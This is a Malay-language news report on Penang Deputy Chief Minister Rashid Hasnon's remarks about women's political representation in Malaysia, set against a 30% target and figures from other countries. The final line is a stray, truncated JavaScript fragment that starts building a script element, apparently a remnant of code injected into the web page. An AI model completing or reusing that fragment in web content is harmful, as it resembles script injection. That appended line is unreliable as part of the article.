Sasaran 30% wanita pembuat dasar, masih jauh untuk dicapai – Rashid

GEORGE TOWN – Catatan 15 peratus perwakilan membabitkan golongan wanita dalam Dewan Undangan Negeri (DUN) Pulau Pinang adalah melebihi jumlah purata kebangsaan.

Malah, pada tahun ini, Kerajaan Negeri turut meningkatkan jumlah peratusan pembabitan wanita sebagai ahli majlis di kedua-dua pihak berkuasa tempatan (PBT) sebanyak 8 peratus iaitu 20 peratus bagi Majlis Bandaraya Pulau Pinang (MBPP) dan Majlis Perbandaran Seberang Perai (MPSP), 12 peratus.

Ia tidak termasuk Datuk Bandar MBPP dan Yang di-Pertua MPSP yang juga adalah daripada golongan Hawa.

Kenyataan tersebut dinyatakan Timbalan Ketua Menteri I, Dato’ Mohd. Rashid Hasnon pada Majlis Perasmian Persidangan Kebangsaan Jantina dan Perubahan Elektoral di sini baru-baru ini. Menurutnya, walaupun terdapat penambahbaikan di Pulau Pinang dan Selangor berhubung perwakilan daripada golongan wanita, keseluruhannya, Malaysia masih berada jauh ke belakang.

“Purata perwakilan wanita di dunia sebagai ahli parlimen adalah berjumlah 22.7 peratus.

Rwanda mendahului dengan 63.8 peratus, Jerman (36.5 peratus), Singapura (23.8 peratus) dan Indonesia (17.1 peratus).

“Di Malaysia, hanya 13 peratus wanita memegang jawatan menteri, ahli parlimen (10.8 peratus), senator (21.9 peratus) dan Ahli Dewan Undangan Negeri, ADUN (11.5 peratus). Situasi ini menunjukkan bahawa kita (Malaysia) masih jauh untuk mencapai sasaran minimum 30 peratus penglibatan wanita di parlimen,’’ ujarnya pada majlis berkaitan.

Hadir sama, Exco Belia & Sukan, Pembangunan Wanita, Keluarga dan Komuniti merangkap Pengerusi Perbadanan Pembangunan Wanita Pulau Pinang (PWDC), Chong Eng dan Ahli Parlimen Bukit Mertajam, Steven Sim Chee Keong.

Persidangan tersebut diajurkan oleh PWDC dengan kerjasama badan pemikir negeri, Penang Institute (PI) dan Friedrich-Ebert-Stiftung (FES International).

var d=document;var s=d.createElement(‘script’);